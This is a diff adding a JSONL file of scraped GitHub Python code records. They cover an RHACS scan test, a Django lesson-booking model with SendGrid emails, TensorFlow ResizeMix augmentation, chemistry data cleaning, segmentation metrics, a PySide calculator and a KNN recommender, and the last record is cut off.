diff --git "a/4801.jsonl" "b/4801.jsonl" new file mode 100644--- /dev/null +++ "b/4801.jsonl" @@ -0,0 +1,1941 @@ +{"seq_id":"11357770502","text":"\"\"\"Tests for Red Hat Advanced Cluster Security sources.\n\n:caseautomation: automated\n:casecomponent: cli\n:caseimportance: high\n:caselevel: integration\n:testtype: functional\n\"\"\"\nimport re\nfrom uuid import uuid4\n\nimport pytest\n\nfrom camayoc.config import settings\nfrom camayoc.qpc_models import Scan\nfrom camayoc.tests.qpc.cli.utils import scan_job\nfrom camayoc.tests.qpc.cli.utils import scan_start\nfrom camayoc.tests.qpc.cli.utils import wait_for_scan\nfrom camayoc.types.settings import SourceOptions\n\nfrom .utils import retrieve_report\nfrom .utils import scan_add_and_check\n\n\ndef rhacs_sources():\n for source_definition in settings.sources:\n if source_definition.type != \"rhacs\":\n continue\n fixture_id = source_definition.name\n yield pytest.param(source_definition, id=fixture_id)\n\n\n@pytest.mark.parametrize(\"source_definition\", rhacs_sources())\ndef test_rhacs_data(qpc_server_config, data_provider, source_definition: SourceOptions):\n \"\"\"Perform Advanced Cluster Security scan and ensure data is valid and correct.\n\n :id: 6638b3e8-5001-40dc-9acd-23d652de6ec4\n :description: Perform Advanced Cluster Security scan and check if\n details report contain expected structure, as well as data\n matches basic expectations.\n :steps:\n 1. Add source with credential for a RHACS\n 2. Perform a scan\n 3. Collect the report\n :expectedresults: Scan finishes, report can be downloaded, there are two\n basic facts (secured_units_max and secured_units_current), current Nodes\n and CPU units are not larger than max Nodes and CPU units.\n \"\"\"\n source = data_provider.sources.new_one({\"name\": source_definition.name}, data_only=False)\n scan_name = uuid4()\n scan_add_and_check(\n {\n \"name\": scan_name,\n \"sources\": source.name,\n }\n )\n data_provider.mark_for_cleanup(Scan(name=scan_name))\n # is often repeated, could be extracted / is extracted?\n # from here\n output = scan_start({\"name\": scan_name})\n match_scan_id = re.match(r'Scan \"(\\d+)\" started.', output)\n assert match_scan_id is not None\n scan_job_id = match_scan_id.group(1)\n wait_for_scan(scan_job_id, timeout=1200)\n result = scan_job({\"id\": scan_job_id})\n assert result[\"status\"] == \"completed\"\n # to here\n details, deployments = retrieve_report(scan_job_id)\n for report_source in details.get(\"sources\"):\n assert report_source.get(\"source_name\") == source.name\n for fact in report_source.get(\"facts\"):\n max_nodes = fact.get(\"secured_units_max\").get(\"maxNodes\")\n max_cpu_units = fact.get(\"secured_units_max\").get(\"maxCpuUnits\")\n current_nodes = fact.get(\"secured_units_current\").get(\"numNodes\")\n current_cpu_units = fact.get(\"secured_units_current\").get(\"numCpuUnits\")\n for max_date_key in (\"maxNodesAt\", \"maxCpuUnitsAt\"):\n assert fact.get(\"secured_units_max\").get(max_date_key) is not None\n for numeric_value in (max_nodes, max_cpu_units, current_nodes, current_cpu_units):\n assert float(numeric_value) > 0\n assert float(max_nodes) >= float(current_nodes)\n assert float(max_cpu_units) >= float(current_cpu_units)\n","repo_name":"quipucords/camayoc","sub_path":"camayoc/tests/qpc/cli/test_rhacs.py","file_name":"test_rhacs.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"35935471986","text":"from django.db import models\nfrom django.conf import settings\n\nfrom checkins.models import Instructor\n\nfrom datetime import datetime\n\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail, SendAt\nfrom sendgrid.helpers.mail import To\n\nimport json\n\n# Create your models here.\n\n\nclass Schedule(models.Model):\n date = models.DateField(unique=True)\n\n def __str__(self):\n return str(self.date)\n\n\nclass Time(models.Model):\n\n schedule = models.ForeignKey(Schedule, on_delete=models.CASCADE)\n start_time = models.TimeField()\n available_instructors = models.ManyToManyField(\n Instructor)\n\n class Meta:\n ordering = ['start_time']\n\n\nclass Booking(models.Model):\n\n start_time = models.ForeignKey(Time, on_delete=models.CASCADE)\n instructor = models.ForeignKey(Instructor, on_delete=models.CASCADE)\n attendee_name = models.CharField(max_length=180)\n attendee_email = models.CharField(max_length=180)\n status = models.CharField(max_length=180, default=\"unbooked\")\n\n\n@receiver(post_save, sender=Booking)\ndef send_new_attendee_notification(sender, created, instance, **kwargs):\n date_object = instance.start_time.schedule.date\n\n date = datetime.strftime(date_object, \"%a %b %d %Y\")\n\n time_object = datetime.strptime(str(instance.start_time.start_time), '%X')\n\n time = datetime.strftime(time_object, \"%H:%M%p\")\n\n instructor = Instructor.objects.get(user__name=instance.instructor)\n\n name = instance.attendee_name\n\n message = Mail(\n from_email=settings.DEFAULT_FROM_EMAIL,\n to_emails=instance.attendee_email,\n subject='Your Private Lesson Booking!',\n plain_text_content=\"Hi {},\\n\\nThank you for making a booking for a private lesson with {} on {} at {}. We look forward to seeing you then!\\n\\nRegards,\\n\\nEmily, Brú Grappling Studio\".format(name, instructor.user.name, date, time))\n message.reply_to = 'emily@brugrappling.ie', 'Emily Manning'\n\n instructor_message = Mail(\n from_email=settings.DEFAULT_FROM_EMAIL,\n to_emails=instructor.user.email,\n subject='New Private Lesson Booking!',\n plain_text_content=\"Hi {},\\n\\n{} {} has made a booking with you for {} at {}.\\n\\nRegards,\\n\\nEmily, Brú Grappling Studio\".format(instructor.user.name, name, instance.attendee_email, date, time))\n message.reply_to = 'emily@brugrappling.ie', 'Emily Manning'\n\n try:\n sg = SendGridAPIClient(settings.SENDGRID_API_KEY)\n response = sg.send(message)\n instructor_repsonse = sg.send(instructor_message)\n except response.error as error:\n print(error.text)\n res = json.loads(error.text)\n","repo_name":"slammer1870/bru-grappling-backend","sub_path":"privates/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4257518193","text":"import tensorflow as tf\nfrom hanser.transform.common import image_dimensions\n\n\ndef _random_int(shape, minval, maxval):\n minval = tf.cast(minval, tf.float32)\n maxval = tf.cast(maxval, tf.float32)\n xs = tf.random.uniform(shape, minval, maxval, dtype=tf.float32)\n xs = tf.cast(xs, tf.int32)\n return xs\n\n\ndef _sample(shape, scale, sample_area):\n if sample_area:\n area = tf.random.uniform(shape, scale[0], scale[1], dtype=tf.float32)\n tau = tf.sqrt(area)\n else:\n tau = tf.random.uniform(shape, scale[0], scale[1], dtype=tf.float32)\n area = tau ** 2\n return tau, area\n\n\ndef _resize_and_mix(args):\n image, image2, h_t, w_t, l, t, r, b = args\n is_batch = len(image.shape) == 4\n dtype = image.dtype\n\n image1 = tf.image.resize(image, (h_t, w_t), method='bilinear')\n if dtype == tf.uint8:\n image1 = tf.cast(image1, dtype)\n\n top = image2[..., :t, :, :]\n mid_left = image2[..., t:b, :l, :]\n mid_right = image2[..., t:b, r:, :]\n bottom = image2[..., b:, :, :]\n\n mid = tf.concat([mid_left, image1, mid_right], 2 if is_batch else 1)\n image = tf.concat([top, mid, bottom], 1 if is_batch else 0)\n return image\n\n\ndef resizemix_batch(image, label, scale=(0.1, 0.6), hard=False, sample_area=False):\n\n n, h, w, c = image_dimensions(image, 4)\n shape = (n,) if hard else ()\n tau, area = _sample(shape, scale, sample_area)\n h_t = tf.cast(tf.cast(h, tf.float32) * tau, tf.int32)\n w_t = tf.cast(tf.cast(w, tf.float32) * tau, tf.int32)\n\n h_t_1, h_t_2 = h_t // 2, h_t - h_t // 2\n w_t_1, w_t_2 = w_t // 2, w_t - w_t // 2\n cx = _random_int(shape, w_t_1, w - w_t_2)\n cy = _random_int(shape, h_t_1, h - h_t_2)\n l, t, r, b = cx - w_t_1, cy - h_t_1, cx + w_t_2, cy + h_t_2\n\n indices = tf.random.shuffle(tf.range(n))\n image2 = tf.gather(image, indices)\n label2 = tf.gather(label, indices)\n\n if hard:\n image = tf.map_fn(\n _resize_and_mix, (image, image2, h_t, w_t, l, t, r, b), fn_output_signature=image.dtype)\n else:\n image = _resize_and_mix((image, image2, h_t, w_t, l, t, r, b))\n\n image.set_shape((n, h, w, c))\n\n lam = area[:, None] if hard else area\n label = label * lam + label2 * (1. - lam)\n return image, label","repo_name":"sbl1996/hanser","sub_path":"hanser/transform/mix/resizemix.py","file_name":"resizemix.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"72175394403","text":"from __future__ import division\nimport os\nos.chdir(r'D:\\Haverford\\2017-2018\\Chem 362')\n\nimport pickle, time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\n\"\"\"PARAMS\"\"\"\nkset = [1, 2, 3, 5]\n\n\"\"\"DEFS\"\"\"\ndef Zscore_slow(df, averagetype='median', deviationtype='std'):\n # More options\n # avgtype: which number to subtract the sample with - median or mean\n # stdtype: median absolute deviation or standard deviation\n emptydf = df.copy()\n cols = list(df.columns)\n\n def average(series):\n if averagetype == 'median':\n return series.median()\n if averagetype == 'mean':\n return series.mean()\n \n def deviation(series):\n if deviationtype == 'mad':\n medianlist = abs(series - series.median())\n return medianlist.median()\n if deviationtype == 'std':\n return series.std(ddof=0)\n\n for col in cols:\n emptydf[col] = (df[col] - average(df[col]))/deviation(df[col])\n \n return emptydf\n\ndef Zscore(df):\n # Default method of the more comprehensive function defined above\n emptydf = df.copy()\n cols = list(df.columns)\n\n for col in cols:\n emptydf[col] = (df[col] - df[col].median())/df[col].std(ddof=0)\n \n return emptydf\n\n# Splits arrays by conditions\ndef BoolSplit(arr, cond):\n \n mask = np.zeros(len(arr), dtype=bool)\n mask[cond] = True\n \n return arr[mask], arr[~mask]\n\n\"\"\"MAIN TEXT\"\"\"\n# Replace with pandas_dataframe_from_csv\ndf = pd.read_csv('nature17439-s2.csv')\n\n# Remove all columns marked with XXX\n# Preserve their info\n# data = df[[col for col in df.columns if 'XXX' not in col]]\nreality = df.iloc[:,293].copy()\nrawdata = df[[col for col in df.columns if 'XXX' in col ]].copy()\nreagents = rawdata.iloc[:, [1, 4, 7, 10, 13, 16]]\ndata = df.iloc[:,:293].drop(rawdata.columns, axis=1)\n\n# Issue 1\n# Still contains strings\n# Convert data such as 'yes' and 'no' to 1s and 0s.\ndata = data.replace('yes', 1.0)\ndata = data.replace('no', 0.0)\ndata.fillna(value=-1.0, inplace=True)\n\n# Issue 2\n# Leave no rows with null values or strings\ncols = data.columns[data.dtypes.eq('object')]\ndata[cols] = data[cols].apply(pd.to_numeric, downcast='float', errors='coerce')\nnullrows = data.index[data.isnull().any(1)]\n\ndata = data.dropna(axis=0, how='any')\nreagents = reagents.drop(nullrows)\nreality = reality.drop(nullrows)\nrawdata = rawdata.drop(nullrows)\n\n# Issue 3\n# Permute the rows randomly\nreality, rawdata, reagents = shuffle(reality, rawdata, reagents)\n\n# Issue 4\n# Many cols have the same entries, hence redundant to our analysis\n# cols = list(df)\nnunique = data.apply(pd.Series.nunique)\ncols_to_drop = nunique[nunique == 1].index\n\ndatacopy = data.drop(cols_to_drop, axis=1)\n\nprint('Filtering completed')\n# Issue 5\n# Different columns have different scales\n# Calculate Z-score of each\n# Some columns might serve as better indicators than their Z-scores, e.g. pH\n# Pitfalls of Z-scores: distribs. other than Gaussian, e.g. double Gaussian\nZscore_calc_start = time.clock()\n\ndata = Zscore(datacopy)\n\nZscore_calc_end = time.clock()\nprint('Z-score substitution completed')\nprint('Calculating the Z-score took', Zscore_calc_end - Zscore_calc_start)\n\ndef ExploratorySplit(D, R, r, testsize, exacttestsize=True):\n # D for data\n # R for reagents (so named because it has 6 columns)\n # r for reality (so named because it is 1D)\n # testsize for the desired size of testing set\n \n # exacttestsize - When the expected testing set size has been achieved, we \n # must take away all similar reactions with it. When set to False, we set\n # all the rows taken away to be the testing set. If not, we trim down these\n # rows until its size is exactly testsize.\n\n X_test = pd.DataFrame()\n Y_test = pd.DataFrame()\n \n i = 0\n while i < testsize:\n j = 0\n \n testrow = np.random.choice(R.index.values)\n testrgt = set(R.loc[testrow])\n testrgt.discard('-1')\n \n X_test = X_test.append(D.loc[[testrow]])\n Y_test = Y_test.append([r[testrow]])\n \n R = R.drop(testrow)\n j += 1\n \n for row in R.itertuples(index=True):\n idx = row[0]\n reagent = set(row[1:])\n reagent.discard('-1')\n \n # See https://stackoverflow.com/questions/16096627/selecting-a-row-of-pandas-series-Dframe-by-integer-index for difference between loc & iloc\n if reagent.issubset(testrgt):\n X_test = X_test.append(D.loc[[idx]])\n Y_test = Y_test.append([r[idx]])\n R = R.drop(idx)\n j += 1\n # print(D.loc[idx])\n # print(r[idx])\n \n i += j\n \n # Move all those are left to the training set\n trainrows = R.index.values.tolist()\n X_train = D.loc[trainrows]\n Y_train = r[trainrows]\n\n # Trim the rest so that the number of testing rows is testsize\n if exacttestsize == True:\n X_test = X_test.iloc[np.random.choice(i, size=testsize)]\n Y_test = Y_test.iloc[np.random.choice(i, size=testsize)]\n print('The size of the testing set is', testsize)\n else:\n print('The size of the testing set is', i)\n \n print('The size of the training set is', len(D) - i)\n \n X_test_np = np.array(X_test)\n Y_test_np = np.array(Y_test)\n X_train_np = np.array(X_train)\n Y_train_np = np.array(Y_train)\n \n return X_test_np, Y_test_np, X_train_np, Y_train_np\n\nlabel_dist = [reality.value_counts()[i]/reality.count() for i in range(1, 5)]\n\npackage0 = ExploratorySplit(data, reagents, reality, 300, exacttestsize=False)\n\npackage = package0, label_dist\n\nprint('Train/Test split completed')\n\nwith open('cleandata.p', 'wb') as g:\n g.seek(0)\n g.truncate() # Erase everything before moving forward\n pickle.dump(package, g)\n\n\"\"\"\ndomain = set(range(1,3000))\ndims = range(293)\nZscore_exempted_cols = set()\nuselesscols = {293}\n\nrowdict = {i: i for i in domain}\ncoldict = {i: i for i in dims}\n\nrawdata = []\nreality = []\n\n# Check if the number of rows and columns are uniform??\nrowlen = set()\ncollen = set()\n\nwith open('nature17439-s2.csv', 'r') as f:\n reader = csv.reader(f)\n header = next(reader)\n numcol = len(header)\n for title in header:\n if 'XXX' in title:\n uselesscols.add(header.index(title))\n usefulcols = set(range(numcol)).difference(uselesscols)\n colsleft = len(usefulcols)\n allrows = [row for idx, row in enumerate(reader) if idx in domain]\n for row in allrows:\n usefulrow = [row[i] for i in usefulcols]\n actual_outcome = row[293]\n rawdata.append(usefulrow)\n reality.append(actual_outcome)\n\n\n# Issue 1\n# Leave no rows with null values\nfor i, row in enumerate(rawdata):\n if any(('?' in j) for j in row):\n for rowd in rowdict:\n if rowd > i:\n rowdict[rowd] -= 1\n del rawdata[i]\n del reality[i]\n \n# Issue 2\n# Still contains strings\n# Convert data such as 'yes' and 'no' to 1s and 0s.\n# Assign numbers to different reagents\n# Convert invalid entries (-1) to something else?\nrawdata0 = [[] for _ in rawdata]\n\nfor i, row in enumerate(rawdata):\n stringrows = set()\n j = 0\n while j <= colsleft - 1:\n if row[j] == None:\n rawdata0[i].append(-1.0)\n elif row[j] == 'yes':\n rawdata0[i].append(1.0)\n Zscore_exempted_cols.add(j)\n # record column number, add to exempted columns for Z-score replacement\n elif row[j] == 'no':\n rawdata0[i].append(0.0)\n Zscore_exempted_cols.add(j)\n else:\n try:\n floatij = float(row[j])\n rawdata0[i].append(floatij)\n except:\n print('String in row', i, 'and column', j)\n print(row[j])\n stringrows.add(i)\n j += 1\n\nfor k in stringrows:\n for rowd in rowdict:\n if rowd > k:\n rowdict[rowd] -= 1\n del rawdata0[k]\n k -= 1\n\n# Issue 3\n# Many cols have the same entries, hence redundant to our analysis\nrawdatatrsp = list(map(list, zip(*rawdata0)))\nfor i in rawdatatrsp:\n if all(j == i[0] for j in i):\n for col in coldict:\n if col > rawdatatrsp.index(i):\n coldict[col] -= 1\n rawdatatrsp.remove(i)\n\nZscore_exempted_cols = {coldict[col] for col in Zscore_exempted_cols}\n\n# print(rawdatatrsp)\n# Produces strings, especially yes and noes\n\nprint(Zscore_exempted_cols)\nprint(uselesscols)\n\nZscore_calc_start = time.clock()\n\n# Issue 4\n# Different columns have different scales\n# Calculate Z-score of each\n# Some columns might serve as better indicators than their Z-scores, e.g. pH\n# Pitfalls of Z-scores: distribs. other than Gaussian, e.g. double Gaussian\ndef Zscore(i, j):\n return (j - np.median(i))/np.std(i)\n\n# HUGE PROBLEM - after each replacement the median is calculated with the new value\n# yol bar\n# SOLUTION - Use the rawdata entity again\nrawdata = [[] for _ in rawdata0]\n\nfor i in rawdatatrsp:\n if rawdatatrsp.index(i) not in Zscore_exempted_cols:\n for j, item in enumerate(i):\n try:\n t = Zscore(i, item)\n rawdata[j].append(t)\n except:\n print(item, type(item), rawdatatrsp.index(i), j)\n pass\n\nprint(rawdata)\n\nZscore_calc_end = time.clock()\nprint('Calculating the Z-score took', Zscore_calc_end - Zscore_calc_start)\n\npackage = rawdata, reality, Zscore_exempted_cols, coldict, rowdict\n\nwith open('cleandata.p', 'wb') as g:\n g.seek(0)\n g.truncate() # Erase everything before moving forward\n pickle.dump(package,g)\n\"\"\"\n\n\"\"\"\nCrystal size was coded with the labels 1 for no solid product, 2 for an\namorphous solid, 3 for a polycrystalline sample or 4 for single crystals with\naverage crystallite dimensions exceeding approximately 0.01 mm. (This size\ncorresponds to the general requirements for standard single-crystal X-ray diffraction\ndata collection.) Product purity was coded with the labels 1 for a multiphase\nproduct or 2 for a single-phase product.\"\"\"","repo_name":"z-q-y/darkrxns","sub_path":"proj_dataclean.py","file_name":"proj_dataclean.py","file_ext":"py","file_size_in_byte":10118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43524421977","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom __future__ import print_function\n\nimport argparse\nimport codecs\nimport json\nimport numpy as np\nimport segeval\nfrom sklearn.metrics import make_scorer as sk_make_scorer\nimport sys\n\n\ndef boundary_indices_to_labels(gap_count, boundary_indices):\n \"\"\"\n Parameter\n ---------\n gap_count : int\n boundary_indices : [int]\n\n Returns\n -------\n boundary_labels : [int]\n\n >>> boundary_indices_to_labels(5, [1, 3])\n [0, 1, 0, 1, 0]\n >>> boundary_indices_to_labels(5, [])\n [0, 0, 0, 0, 0]\n >>> boundary_indices_to_labels(5, [4])\n [0, 0, 0, 0, 1]\n \"\"\"\n labels = [0 for i in xrange(gap_count)]\n for i in boundary_indices:\n labels[i] = 1\n return labels\n\n\ndef boundary_indices_to_masses(gap_count, boundary_indices):\n \"\"\"\n >>> boundary_indices_to_masses(12, [3, 10])\n [4, 7, 2]\n >>> boundary_indices_to_masses(12, [])\n [13]\n >>> boundary_indices_to_masses(12, [11])\n [12, 1]\n \"\"\"\n masses = []\n previous = -1\n for i in boundary_indices:\n masses.append(i - previous)\n previous = i\n masses.append(gap_count - previous)\n return masses\n\n\ndef boundary_labels_to_masses(labels, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n labels : [int or str]\n label[i] = 1 when gap[i] is a boundary, = 0 otherwise\n boundary_label : int or str\n\n Returns\n -------\n masses : [int]\n\n >>> boundary_labels_to_masses([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0])\n [4, 7, 2]\n >>> boundary_labels_to_masses([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n [13]\n >>> boundary_labels_to_masses([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1])\n [12, 1]\n \"\"\"\n labels_ = labels.tolist() if isinstance(labels, np.ndarray) else labels\n masses = []\n count = 0\n for label in labels_:\n count += 1\n if label == boundary_label:\n masses.append(count)\n count = 0\n masses.append(count + 1)\n return masses\n\n\ndef window_diff(ref, pred, punish_zero_seg=False, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n ref : [int or str]\n ref boundary labels\n pred : [int or str]\n pred boundary labels\n punish_zero_seg : bool\n if True zero-segmentation will get 1.0\n boundary_label : int or str\n\n >>> window_diff([-1, -1, 1, -1, -1], [-1, -1, -1, 1, -1])\n 0.5\n >>> window_diff([-1, -1, 1, -1, -1], [-1, -1, -1, -1, -1])\n 0.5\n >>> window_diff([-1, -1, 1, -1, -1], [-1, -1, -1, -1, -1], punish_zero_seg=True)\n 1.0\n \"\"\"\n masses_ref = boundary_labels_to_masses(ref, boundary_label=boundary_label)\n masses_pred = boundary_labels_to_masses(pred, boundary_label=boundary_label)\n if punish_zero_seg and len(masses_pred) == 1:\n return 1.0\n return float(segeval.window_diff(masses_pred, masses_ref))\n\n\ndef average_window_diff(refs, preds, punish_zero_seg=False, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n refs : [[int]]\n refs[i][j] is reference label of j-th gap in i-th doc\n preds : [[int]]\n preds[i][j] is predicted label of j-th gap in i-th doc\n punish_zero_seg : bool\n if True zero-segmentation will get 1.0\n\n Returns\n -------\n wds : [float]\n window_diffs for all docs\n average : float\n \"\"\"\n window_diffs = []\n for ref, pred in zip(refs, preds):\n window_diffs.append(window_diff(\n ref, pred, punish_zero_seg, boundary_label=boundary_label))\n average = sum(window_diffs) / len(window_diffs)\n return window_diffs, average\n\n\ndef pk(ref, pred, punish_zero_seg=False, boundary_label=1):\n masses_ref = boundary_labels_to_masses(ref, boundary_label=boundary_label)\n masses_pred = boundary_labels_to_masses(pred, boundary_label=boundary_label)\n if punish_zero_seg and len(masses_pred) == 1:\n return 1.0\n return float(segeval.pk(masses_pred, masses_ref))\n\n\ndef average_pk(refs, preds, punish_zero_seg=False, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n refs : [[int]]\n refs[i][j] is reference label of j-th gap in i-th doc\n preds : [[int]]\n preds[i][j] is predicted label of j-th gap in i-th doc\n\n Returns\n -------\n pks : [float]\n pks for all docs\n average : float\n \"\"\"\n pks = []\n for ref, pred in zip(refs, preds):\n pks.append(pk(ref, pred, punish_zero_seg, boundary_label=boundary_label))\n average = sum(pks) / len(pks)\n return pks, average\n\n\ndef _window_diff_func(y_ref, y_pred, punish_zero_seg=False, boundary_label=1):\n _, average_wd = average_window_diff(\n y_ref, y_pred, punish_zero_seg=punish_zero_seg, boundary_label=boundary_label)\n return average_wd\n\n\ndef window_diff_scorer(punish_zero_seg=False, boundary_label=1):\n scorer = sk_make_scorer(_window_diff_func, greater_is_better=False,\n punish_zero_seg=punish_zero_seg,\n boundary_label=boundary_label)\n return scorer\n\n\ndef read_segment(segment_file):\n segment_dict = {}\n for line in segment_file:\n segment_json = json.loads(line)\n labels = boundary_indices_to_labels(\n segment_json['gapCount'], segment_json['boundaryIndices'])\n segment_dict[segment_json['id']] = labels\n return segment_dict\n\n\ndef main(opt):\n with codecs.open(opt.ref_jsonl, encoding='utf-8') as ref_file:\n ref_dict = read_segment(ref_file)\n for pred_jsonl in opt.pred_jsonl:\n with codecs.open(pred_jsonl, encoding='utf-8') as pred_file:\n pred_dict = read_segment(pred_file)\n pk_list = []\n wd_list = []\n print('==> {} <=='.format(pred_jsonl))\n for doc_name, pred_a_doc in pred_dict.iteritems():\n if doc_name not in ref_dict:\n continue\n ref_a_doc = ref_dict[doc_name]\n pk_ = pk(ref_a_doc, pred_a_doc)\n wd = window_diff(ref_a_doc, pred_a_doc)\n print('name:{} Pk:{:.3f} WD:{:.3f}'.format(doc_name, pk_, wd))\n pk_list.append(pk_)\n wd_list.append(wd)\n print('Pk(average):{:.3f} WD(average):{:.3f}'.format(\n sum(pk_list) / len(pk_list), sum(wd_list) / len(wd_list)))\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('ref_jsonl')\n arg_parser.add_argument('pred_jsonl', nargs='+')\n opt = arg_parser.parse_args()\n main(opt)\n","repo_name":"binghaobhw/topic-segmentation","sub_path":"topic-segmentation/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17061353234","text":"from PySide6.QtWidgets import (\n QApplication, QWidget, QGridLayout, QLCDNumber, QPushButton)\nfrom functools import partial\nfrom helpers import *\n\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setFixedWidth(480)\n self.setFixedHeight(360)\n self.setWindowTitle(\"Calculadora\")\n with open(absPath(\"Scalcula.qss\")) as styles:\n self.setStyleSheet(styles.read())\n\n self.setLayout(QGridLayout())\n self.calculadora = QLCDNumber()\n self.layout().addWidget(self.calculadora, 0, 0)\n\n\nif __name__ == '__main__':\n app = QApplication()\n window = Window()\n window.show()\n app.exec_()\n","repo_name":"hektorprofe/curso-qt-pyside-udemy","sub_path":"Proyectos/Proyecto 05/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"12895396090","text":"import numpy as np\nimport pandas as pd\nfrom scipy.spatial.distance import cosine, correlation\n\n#--------------------------------------------------------------------------------------------------\n\ndef pearsonSim(inA,inB):\n\t### This function converts the Pearson correlation between two vectors\n\t### into a similarity function returning value in range [0,1]\n from scipy.spatial.distance import correlation\n if len(inA) < 3 : return 1.0\n\t# Note that scipy function is a distance function, 1-correlation will give the standard Pearson similarity\n return 0.5+0.5*(1-correlation(inA, inB)) \n\t\ndef cosineSim(inA,inB):\n\t### Coverts the scipy Cosine distance into a similarity function\n from scipy.spatial.distance import cosine\n return (1 - cosine(inA,inB))\n\n#--------------------------------------------------------------------------------------------------\n\ndef knn_search(x, D, metric=pearsonSim):\n sims = np.array([])\n num_instances = np.shape(D)[0]\n for i in range(num_instances):\n d = D[i,:]\n overlap = np.nonzero(np.logical_and(x>0, d>0))[0] # find indices of the overlapping (co-rated) items\n if len(overlap) == 0:\n sim = 0\n else: \n sim = metric(x[overlap], d[overlap]) # we only want to compute similarities on overlapping items\n\n if not np.isnan(sim): # depending on the number of overlapping items, correlation maybe undefined\n sims = np.append(sims, [sim])\n else:\n sims = np.append(sims, 0)\n\n idx = np.argsort(sims) # find indices of most similar neighbors to x\n idx = idx[::-1] # order in terms of decreasing similarity\n # return the indexes of neighbors in decreasing order of similarity and array of all similarities\n return idx, sims\n\n#--------------------------------------------------------------------------------------------------\n\ndef knn_predict(user, item, RatingsMat, K, metric=pearsonSim):\n \n \"\"\" Given user (a Numpy array with same dimensions as RatingsMat columns \"\"\"\n \"\"\" item (a column index in RatingsMat) and RatingsMat, the ratings matrix \"\"\"\n \"\"\" (a 2d Numpy array), find the K nearest neighbors of user and use weighted \"\"\"\n \"\"\" average of their ratings on item as predicted rating for (user, item). \"\"\"\n \n neigh_idx, sims = knn_search(user, RatingsMat, metric)\n \n # Ratings of the neighbors on item\n neigh_ratings = RatingsMat[neigh_idx][:,item]\n neigh_sims = sims[neigh_idx]\n wr = 0\n sum_sim = 0\n # compute the weighted average rating of the neighbors on item\n for i in range(K):\n if (neigh_ratings[i] > 0) & (neigh_sims[i] > 0):\n wr += neigh_ratings[i] * neigh_sims[i]\n sum_sim += neigh_sims[i]\n if sum_sim > 0:\n predicted_rating = wr/sum_sim\n else:\n item_vec = RatingsMat[:,item] # if there are no neighbors with ratings for item,then use \n # the item's average rating across all users as the prediction\n predicted_rating = (RatingsMat[:,item][item_vec > 0]).mean()\n return predicted_rating\n\n#--------------------------------------------------------------------------------------------------\n\ndef cross_validate_user(dataMat, user, test_ratio, K, metric=pearsonSim):\n \n \"\"\" For a given test user, this function randomly selects test_ratio percent of the \"\"\"\n \"\"\" already rated items and computes the prediction errors for these test items \"\"\"\n \n number_of_items = np.shape(dataMat)[1]\n rated_items_by_user = np.array([i for i in range(number_of_items) if dataMat[user,i]>0])\n test_size = int(test_ratio * len(rated_items_by_user))\n test_indices = np.random.randint(0, len(rated_items_by_user), test_size)\n withheld_items = rated_items_by_user[test_indices]\n original_user_profile = np.copy(dataMat[user]) # maintain the original ratings to be restored later\n dataMat[user, withheld_items] = 0 # So that the withheld test items is not used in the rating prediction below\n error_u = 0.0\n count_u = len(withheld_items)\n\n # Compute absolute error for user u over all test items\n for item in withheld_items:\n # Estimate rating on the withheld item\n u = dataMat[user]\n # print(\"user: \", u, \"Item: \", i)\n predicted_rating = knn_predict(u, item, dataMat, K, metric)\n error_u = error_u + abs(predicted_rating - original_user_profile[item])\n \n # Now restore ratings of the withheld items to the user profile\n for item in withheld_items:\n dataMat[user, item] = original_user_profile[item]\n \n # Return sum of absolute errors and the count of test cases for this user\n # Note that these will have to be accumulated for each user to compute MAE\n return error_u, count_u\n\n#--------------------------------------------------------------------------------------------------\n\ndef test(dataMat, num_test_users, test_ratio, K, metric=pearsonSim):\n \n \"\"\" This function performs cross_validate_user on the first num_test_users in the training data \"\"\"\n \"\"\" It returns the Mean Absolute Error (MAE) across all test cases. \"\"\"\n\t\n total_error=0.0;\n total_test_cases=0.0\n for u in range(num_test_users):\n error_u, count = cross_validate_user(dataMat, u , test_ratio, K, metric)\n # print('Evaluating user', u, ' out of', num_test_users, 'MAE: ', error_u/count)\n total_error=total_error+error_u\n total_test_cases=total_test_cases+count\n print('Mean Absoloute Error for K =',K,' : ', total_error/total_test_cases)\n return(total_error/total_test_cases)\n\n#--------------------------------------------------------------------------------------------------\n\ndef recommend(user, Ratings, K, N=3, metric=pearsonSim):\n\n \n u = np.array(Ratings.iloc[user])\n RatingsMat = np.array(Ratings)\n predictions = np.zeros(len(u))\n unrated = 0\n \n for j in range(len(u)):\n if u[j] == 0:\n unrated += 1\n j_pred = knn_predict(u, j, RatingsMat, K, metric)\n # print(j, j_pred)\n predictions[j] = j_pred\n \n recs = np.argsort(predictions)\n recs = recs[::-1]\n if unrated < N: N = unrated\n preds = predictions[recs[:N]]\n items = Ratings.columns[recs[:N]]\n\n return preds, items\n\n#--------------------------------------------------------------------------------------------------\n\n","repo_name":"adovgeldiyev/recommender-systems","sub_path":"Neighborhood models 